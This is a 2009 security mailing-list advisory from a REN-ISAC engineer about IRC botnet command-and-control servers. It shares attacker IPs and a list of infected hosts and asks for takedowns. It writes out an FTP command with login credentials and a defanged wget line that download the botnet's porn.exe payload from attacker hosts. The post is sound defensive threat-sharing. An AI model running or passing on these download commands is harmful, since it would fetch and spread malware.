[nsp-sec] IRC bot C&C

Fri Jun 19 17:59:00 EDT 2009

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Greetings,

A trusted source has passed along ~11000 IPs that were seen connecting
to multiple IRC C&Cs at the institution.

When the compromised machine connected to the IRC it was instructed to
download:

porn.exe via ftp 89.248.166.8

OR

porn.exe via wget 64.85.170.38

These were both online today with additional .exe's on the ftp site. (I
do have those if you want them or if it goes offline)

[FTP]

ftp 89.248.166.8 21 fgt dongs porn.exe
(user = ftg | pass = dongs)

[wget]
wget hxxp://64.85.170.38/porn.exe

I suppose we should try to get 89.248.166.8 and 64.85.170.38 taken
offline unless someone has a reason to leave them up.

> AS      | IP               | AS Name
> 29073   | 89.248.166.8     | ECATEL-AS AS29073, Ecatel Network
> 30517   | 64.85.170.38     | GREAT-LAKES-COMNET - Great Lakes Comnet, Inc.

Attached are the ~11000 IPs that were seen connecting to the IRC C&Cs.

Data in the info field is space delimited:

1. # of flow inbound to c&c
2. First time seen (GMT -0400)
3. SrcPort
4. Last time seen (GMT -0400)
5. SrcPort

Please take whatever actions you deem appropriate and please let me know
if you have any questions or comments.

Regards,

Gabe

- --
Gabriel Iovino
Principal Security Engineer, REN-ISAC
http://www.ren-isac.net
24x7 Watch Desk +1(317)278-6630
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.10 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAko8CiQACgkQwqygxIz+pTvjXgCfTogln8ftgjLQGVyOPDyN22nH
Qs0AoKhf0dylx7Hxz4ND0mLrZNtxX8J7
=YYy9
-----END PGP SIGNATURE-----
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: asn.txt
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20090619/419604bc/attachment-0001.txt>